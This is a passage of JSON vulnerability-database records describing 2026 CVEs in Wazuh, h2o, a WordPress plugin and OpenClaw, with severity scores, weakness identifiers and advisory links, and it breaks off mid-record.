4.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wazuh","product":"wazuh","versions":[{"version":">= 4.0.0, < 4.10.4","status":"affected"},{"version":">= 4.11.0, < 4.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:53:24.188275Z","id":"CVE-2026-39359","options":[{"exploitation":"poc"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"references":[{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-6q95-fcwc-4h44","source":"security-advisories@github.com"},{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-6q95-fcwc-4h44","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-54340","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T00:16:25.810","lastModified":"2026-07-17T19:17:17.030","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"h2o is an HTTP server with support for HTTP/1.x, HTTP/2 and HTTP/3. Prior to commit 9265bdd, there is an HTTP/2 state amplification issue that combines HPACK decompression amplification with Slowloris-style stream stalling. Amplified decoded header state can be retained by stalled HTTP/2 streams, and depending on the configuration, additional limits are needed to bound decoded header state and prevent attack. This issue has been fixed by commit 9265bdd."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"h2o","product":"h2o","versions":[{"version":"< 9265bdd","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:26:10.914862Z","id":"CVE-2026-54340","options":[{"exploitation":"none"},{"automatable":"yes"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-400"},{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/h2o/h2o/commit/9265bdd9a996ed992681055e3996baf3e09d2063","source":"security-advisories@github.com"},{"url":"https://github.com/h2o/h2o/security/advisories/GHSA-qcrr-wrhc-pgq9","source":"security-advisories@github.com"}]}},{"cve":{"id":"CVE-2026-2594","sourceIdentifier":"security@wordfence.com","published":"2026-07-17T02:18:05.607","lastModified":"2026-07-17T16:17:14.623","vulnStatus":"Deferred","cveTags":[],"descriptions":[{"lang":"en","value":"The Smart Custom Fields plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 5.0.7. This is due to insufficient input sanitization and output escaping of uploaded image attachment titles. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. NOTE: This vulnerability was partially patched in 5.0.7."}],"affected":[{"source":"security@wordfence.com","affectedData":[{"vendor":"inc2734","product":"Smart Custom Fields","defaultStatus":"unaffected","versions":[{"version":"0","lessThanOrEqual":"5.0.7","versionType":"semver","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security@wordfence.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N","baseScore":6.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":2.7}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T15:07:20.423367Z","id":"CVE-2026-2594","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security@wordfence.com","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"references":[{"url":"https://plugins.trac.wordpress.org/changeset/3485210/smart-custom-fields","source":"security@wordfence.com"},{"url":"https://plugins.trac.wordpress.org/changeset/3609564/smart-custom-fields","source":"security@wordfence.com"},{"url":"https://www.wordfence.com/threat-intel/vulnerabilities/id/110a1b28-50e0-430e-82d4-c254d73836e2?source=cve","source":"security@wordfence.com"}]}},{"cve":{"id":"CVE-2026-40106","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T02:18:05.780","lastModified":"2026-07-17T18:00:02.913","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Wazuh is a free and open source platform used for threat prevention, detection, and response. Versions 4.6.0 and above prior to 4.14.5 contain a heap-based buffer overflow vulnerability in the syscheck component of the Wazuh agent for Windows. When expanding registry paths containing wildcards (* or ?), the agent allocates a fixed-size heap buffer of 256 bytes (OS_SIZE_256). By creating a registry subkey with a maximum allowed length (255 characters) inside a monitored path, a low-privileged local attacker can force an out-of-bounds write during string concatenation. Since wazuh-agent.exe runs as NT AUTHORITY\\SYSTEM, this can lead to a silent Denial of Service (blinding the agent) or potentially Local Privilege Escalation (LPE). This issue has been fixed in version 4.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wazuh","product":"wazuh","versions":[{"version":">= 4.6.0, < 4.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":4.7,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"HIGH","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":1.0,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:31:18.374964Z","id":"CVE-2026-40106","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-122"}]}],"references":[{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-qvrc-pcfc-jhqc","source":"security-advisories@github.com"},{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-qvrc-pcfc-jhqc","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-44251","sourceIdentifier":"security-advisories@github.com","published":"2026-07-17T02:18:05.973","lastModified":"2026-07-17T19:17:13.660","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"Wazuh is a free and open source platform used for threat prevention, detection, and response. In versions 3.0.0 and above, prior to 4.14.5, a size_t integer underflow in os_crypto/shared/msgs.c:389 allows any enrolled Wazuh agent to crash the wazuh-remoted process on the manager, immediately disconnecting all agents from the manager. A second code path reached by the same underflow may allow heap memory corruption. This issue has been fixed in version 4.14.5."}],"affected":[{"source":"security-advisories@github.com","affectedData":[{"vendor":"wazuh","product":"wazuh","versions":[{"version":">= 3.0.0, < 4.14.5","status":"affected"}]}]}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T17:33:37.849028Z","id":"CVE-2026-44251","options":[{"exploitation":"poc"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Secondary","description":[{"lang":"en","value":"CWE-122"},{"lang":"en","value":"CWE-191"}]}],"references":[{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-jv5r-5p7c-g9fq","source":"security-advisories@github.com"},{"url":"https://github.com/wazuh/wazuh/security/advisories/GHSA-jv5r-5p7c-g9fq","source":"134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}},{"cve":{"id":"CVE-2026-62201","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:06.170","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.6.6 contain a network policy bypass vulnerability in the sandbox exec-server that allows lower-trust callers to reach internal network destinations blocked by OpenClaw policy. Attackers can send HTTP requests through the exec-server to access network resources that should have been restricted by configured policies."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.6","versionType":"semver","status":"affected"},{"version":"2026.6.6","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":4.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"HIGH","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","baseScore":7.7,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"CHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.1,"impactScore":4.0}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:45:30.803855Z","id":"CVE-2026-62201","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-918"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-mgvr-6gvw-3rgr","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-network-policy-bypass-via-exec-server","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62205","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:06.747","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions 2026.4.12-beta.1 before 2026.6.6 contain a missing-authorization vulnerability in the MS Teams message actions feature. When the affected feature is enabled and reachable, a lower-trust caller or a configured input path can perform actions that should have required a stronger authorization or policy check. Practical impact depends on the operator's configuration and whether lower-trust input can reach that path. The issue is fixed in 2026.6.6."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"2026.4.12","lessThan":"2026.6.6","versionType":"semver","status":"affected"},{"version":"2026.6.6","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T13:02:04.785564Z","id":"CVE-2026-62205","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p5xh-frrh-cmgj","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-beta-1-authorization-bypass-via-message-actions","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62206","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:06.887","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.6.9 contain a missing authorization vulnerability in Discord moderation actions. In affected versions, a lower-trust caller or configured input path could perform moderation actions that should have required a stronger authorization or policy check. Practical impact depends on the operator's configuration and whether lower-trust input can reach the affected path."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.9","versionType":"semver","status":"affected"},{"version":"2026.6.9","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"LOW","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L","baseScore":7.1,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"LOW"},"exploitabilityScore":2.8,"impactScore":4.2}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T14:17:13.178791Z","id":"CVE-2026-62206","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-862"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-f6p7-6326-vf7v","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authentication-bypass-via-moderation-actions","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62208","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:07.187","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw before 2026.6.5 could forward Authorization headers during MCP SSE redirects. When the affected feature is enabled and reachable, a lower-trust caller or configured input path could execute or persist actions beyond the caller's intended authorization. Impact depends on the operator's configuration and whether lower-trust input can reach the affected path."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.5","versionType":"semver","status":"affected"},{"version":"2026.6.5","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}],"ssvcV203":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","ssvcData":{"timestamp":"2026-07-17T10:44:52.830545Z","id":"CVE-2026-62208","options":[{"exploitation":"none"},{"automatable":"no"},{"technicalImpact":"partial"}],"role":"CISA Coordinator","version":"2.0.3"}}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Secondary","description":[{"lang":"en","value":"CWE-522"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9c3v-684m-579c","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-authorization-header-forwarding-via-sse","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62210","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:07.470","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.6.1 contain a denial of service vulnerability where remote media URLs can trigger slow-read attacks that exhaust gateway worker resources. Attackers with access to configured input paths can supply remote media URLs that consume gateway resources and reduce availability."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.1","versionType":"semver","status":"affected"},{"version":"2026.6.1","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"NONE","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-770"}]}],"references":[{"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-4xwj-mcc7-x7x5","source":"disclosure@vulncheck.com"},{"url":"https://www.vulncheck.com/advisories/openclaw-denial-of-service-via-remote-media-urls","source":"disclosure@vulncheck.com"}]}},{"cve":{"id":"CVE-2026-62211","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-07-17T02:18:07.620","lastModified":"2026-07-17T18:08:08.140","vulnStatus":"Undergoing Analysis","cveTags":[],"descriptions":[{"lang":"en","value":"OpenClaw versions before 2026.6.1 contain a credential redaction bypass vulnerability in the trajectory export feature that allows lower-trust callers to access data that should remain within trusted boundaries. Attackers can exploit misconfigured input paths or feature accessibility to expose sensitive credentials and data through the export mechanism."}],"affected":[{"source":"disclosure@vulncheck.com","affectedData":[{"vendor":"OpenClaw","product":"OpenClaw","defaultStatus":"unaffected","repo":"https://github.com/openclaw/openclaw","packageURL":"pkg:npm/openclaw","versions":[{"version":"0","lessThan":"2026.6.1","versionType":"semver","status":"affected"},{"version":"2026.6.1","versionType":"semver","status":"unaffected"}]}]}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":4.1,"baseSeverity":"MEDIUM","attackVector":"LOCAL","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"ACTIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityIm